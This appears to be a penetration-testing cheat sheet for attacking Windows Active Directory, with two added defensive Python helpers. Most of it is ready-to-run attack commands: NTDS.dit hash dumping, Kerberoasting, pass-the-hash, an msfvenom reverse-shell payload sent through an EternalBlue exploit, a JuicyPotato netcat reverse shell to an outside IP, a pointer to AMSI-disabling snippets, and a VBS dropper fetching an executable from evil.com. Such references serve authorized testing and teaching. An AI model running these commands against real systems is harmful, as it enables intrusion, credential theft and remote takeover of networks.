Pentesting Active Directory forests of BSOD boxes
General Resources
Initial discovery and enumeration
NetBios scan
```shell
sudo nbtscan -v -s : -r 10.10.10.0/24
```
Find domain controllers
Get the hostnames and ip addresses of DCs (Domain Controllers).
```
C:\> ipconfig /all    # Look for DNS entries
C:\> nslookup <domain>
# Or, interactively:
C:\> nslookup
> set type=all
> _ldap._tcp.dc._msdcs.EXAMPLEDOMAIN
```
Active Directory enumeration
Bloodhound
BloodHound (docs) lets you find and visualize paths in the Active Directory structure. First run an ingestor such as SharpHound (.exe or .ps1) or BloodHound.py, then feed the collected data into BloodHound's Neo4j database. The import can be automated with bloodhound-import.
```shell
bloodhound-python -c All -u <user> -p <passwd> -d <domain>
bloodhound-import -du neo4j -dp <passwd> *.json
bloodhound
```
Bloodhound queries
```cypher
// Accounts able to perform RBCD
// Source: https://twitter.com/KenjiEndo15/status/1578811281498599425
MATCH p=(g)-[:AddAllowedToAct|WriteAccountRestrictions]->(c:Computer) RETURN p
```
PingCastle
PingCastle by Vincent Le Toux is a Windows executable that assesses the most important security misconfigurations of an Active Directory environment. Among its nifty features you can find AD object graph visualisation and clear HTML reports.
Manual queries
Local enumeration
General system info and config.
```
C:\> systeminfo
C:\> netsh firewall show state
C:\> netsh firewall show config
C:\> wmic os list brief
C:\> wmic qfe get Caption,Description,HotFixID,InstalledOn
C:\> net share
C:\> wmic useraccount
```
```powershell
PS C:\> Get-WmiObject -Class Win32_OperatingSystem | select SystemDirectory,BuildNumber,SerialNumber,Version | ft
PS C:\> Get-Service | ? {$_.Status -eq "Running"}
PS C:\> Get-MpComputerStatus | findstr "True"
PS C:\> Get-WmiObject win32_useraccount
```
Search file names or directory names recursively with `dir /s`; find text in files with `findstr`.
```
C:\> dir /s *passw*
C:\> findstr /si passw *.txt
```
Look for unquoted Service Paths
```
C:\> wmic service get name,displayname,pathname,startmode | findstr /i "Auto"
C:\> sc qc <service>    # Check for quotes and spaces in BINARY_PATH_NAME
```
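As an added example (not from the original page), the same check done programmatically over rows in the shape of the `wmic service get` output above, with the two things a defender needs next: the directories whose write ACLs must be verified, and the quoted `binPath=` that fixes the service. Service names and paths in the sample are constructed.

```python
import re
import ntpath

# Constructed sample rows (made-up service names and paths, not from a real
# host) mirroring the columns of `wmic service get name,pathname,startmode`.
SAMPLE_SERVICES = [
    ("wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs", "Auto"),
    ("VulnSvc", r"C:\Program Files\Vuln Corp\Service Dir\service.exe -run", "Auto"),
    ("SafeSvc", r'"C:\Program Files\Safe Corp\service.exe" -run', "Auto"),
    ("ManualSvc", r"C:\Program Files\Other Corp\agent.exe", "Manual"),
]

# Executable is everything up to the first ".exe"; the rest are arguments.
_EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE | re.DOTALL)

def split_pathname(pathname):
    """(executable, arguments) of an unquoted command line; None if quoted or no .exe."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return None  # quoted paths are parsed unambiguously by the SCM
    m = _EXE_RE.match(pathname)
    return (m.group(1), m.group(2) or "") if m else None

def is_unquoted_with_spaces(pathname):
    """True when the binary path is unquoted and contains a space."""
    parts = split_pathname(pathname)
    return parts is not None and " " in parts[0]

def acl_review_points(pathname):
    """Directories whose write ACLs must be verified: parent of each prefix ending at a space."""
    if not is_unquoted_with_spaces(pathname):
        return []
    exe = split_pathname(pathname)[0]
    dirs = []
    for i, ch in enumerate(exe):
        parent = ntpath.dirname(exe[:i]) if ch == " " else None
        if parent and parent not in dirs:
            dirs.append(parent)
    return dirs

def quoted_pathname(pathname):
    """Remediated command line for `sc config <svc> binPath= ...`."""
    if not is_unquoted_with_spaces(pathname):
        return pathname
    exe, args = split_pathname(pathname)
    return f'"{exe}"{args}'

def find_unquoted(services, auto_only=True):
    """Names of affected services, by default only those with StartMode=Auto."""
    return [name for name, path, mode in services
            if is_unquoted_with_spaces(path) and (mode == "Auto" or not auto_only)]
```

Feed it real rows from `wmic service get name,pathname,startmode /format:csv` and fix each hit with `sc config` using the quoted path, then confirm the listed directories are not writable by standard users.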
Powershell
```powershell
PS C:\> Get-ExecutionPolicy -List
PS C:\> Set-ExecutionPolicy Bypass -Scope Process
```
Services
```powershell
PS C:\> Get-ACL -Path HKLM:\System\CurrentControlSet\Services\wuauserv | Format-List
```
Sysinternals
```
C:\> \\live.sysinternals.com\tools\procdump.exe -accepteula
```
Responder
When working on a Windows/AD environment, it is never a bad idea to have Responder running in the background. It is a wonderful and extremely featureful tool; I highly recommend that you check out its documentation.
Privilege escalation
Enumeration
Resources:
- HackTricks with a checklist.
Tools:
- PrivescCheck by itm4n: Powershell script.
- windowsprivchecker by Tib3rius: Batch script.
NTDS.dit extraction
The NTDS.dit file is located on Domain Controllers and contains the password hashes of Active Directory users. There are various ways to extract them:
- With local administrator access, as described by Ultimate Windows Security (Volume Shadow Copy Service (VSS), Ntdsutil.exe, PowerSploit NinjaCopy).
- Remotely via SMB with CrackMapExec:
```shell
$ cme smb -u Administrator -p Password123 --ntds (drsuapi|vss) <target>
```
Once the hashes are retrieved they can either be used as-is (for example in pass-the-hash attacks, see below) or cracked to recover the plaintext user passwords.
Kerberoasting
Look for roastable accounts:
```shell
GetUserSPNs.py -request -dc-ip 10.10.10.10 <domain>/<user>:<passwd>
```
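As an added defensive counterpart (not part of the original page): each ticket that `GetUserSPNs.py -request` pulls is logged on the DC as Security event 4769, usually with RC4 encryption (TicketEncryptionType 0x17), so a burst of RC4 service-ticket requests for many distinct user SPNs from one client is the classic signature. The sample events below are constructed; field names follow the 4769 event but are shortened.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4769 (Kerberos service ticket request)
# fields; hosts, accounts and times are made up for this example.
SAMPLE_4769 = [
    {"time": "2024-01-10T09:00:01", "client": "10.10.10.50", "service": "WORKSTATION1$", "etype": "0x12", "status": "0x0"},
    {"time": "2024-01-10T09:00:05", "client": "10.10.10.50", "service": "sql_svc", "etype": "0x17", "status": "0x0"},
    {"time": "2024-01-10T09:00:06", "client": "10.10.10.50", "service": "http_svc", "etype": "0x17", "status": "0x0"},
    {"time": "2024-01-10T09:00:06", "client": "10.10.10.50", "service": "backup_svc", "etype": "0x17", "status": "0x0"},
    {"time": "2024-01-10T09:00:07", "client": "10.10.10.50", "service": "krbtgt", "etype": "0x12", "status": "0x0"},
    {"time": "2024-01-10T09:30:00", "client": "10.10.10.77", "service": "sql_svc", "etype": "0x17", "status": "0x0"},
]

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC, the crackable etype

def is_roast_candidate(ev):
    """A successful TGS request for a user SPN (not a machine account or krbtgt) using RC4."""
    svc = ev["service"]
    return (ev["etype"].lower() == RC4_HMAC and ev["status"] == "0x0"
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def kerberoast_bursts(events, window=timedelta(minutes=5), threshold=3):
    """Map client IP -> sorted distinct SPNs for clients that requested RC4
    tickets for at least `threshold` distinct service accounts within `window`."""
    per_client = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            per_client[ev["client"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    alerts = {}
    for client, reqs in per_client.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):  # sliding window from each request
            in_window = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(in_window) >= threshold:
                alerts[client] = sorted(in_window)
                break
    return alerts
```

The single RC4 request from the second client stays below the threshold, which is the usual noise level from legacy clients; service accounts restricted to AES (msDS-SupportedEncryptionTypes) or moved to gMSAs shrink what such a burst yields.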
SMB shares
```shell
cme smb <domain> -u <user> -p <passwd> --shares
```
Abuse GenericAll and GenericWrite
Pass-the-hash
By using Impacket's psexec:
```shell
$ python examples/psexec.py -hashes '<hash here>' username@10.1.2.3
```
MS17-010 - EternalBlue
Metasploit or external scripts, for example from helviojunior.
```shell
git clone https://github.com/helviojunior/MS17-010.git
cd MS17-010
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=7766 -f exe > eternalblue.exe
python2 send_and_execute.py <target> eternalblue.exe
```
JuicyPotato
Hacktricks on JuicyPotato. Check this Windows CLSID list if needed, use this script to extract all CLSIDs.
Here we spawn a netcat reverse shell with administrator privileges.
```
.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c C:\inetpub\wwwroot\nc.exe -e cmd.exe 192.168.119.132 8443" -t *
```
AMSI
- AMSI.fail: Generate Powershell snippets to disable AMSI for the current process.
Windows Defender
List excluded paths
```
reg query "HKLM\Software\Microsoft\Windows Defender\Exclusions\Paths"
```
Misc
Remove password from Excel spreadsheet
A simple way to remove the password from protected cells is to unzip the spreadsheet, locate and remove the hash of the password, and rezip.
```shell
7z x Protected.xlsx
sed -i -e 's/<sheetProtection.*\/>//g' xl/worksheets/sheet2.xml
7z a Unprotected.xlsx .
libreoffice Unprotected.xlsx
```
VBS snippets
File download
Uses Microsoft.XMLHTTP to download and save a file locally.
```vbscript
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.evil.com/legit.exe", False
xHttp.Send
with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile "C:\Users\Public\legit.exe", 2
end with
```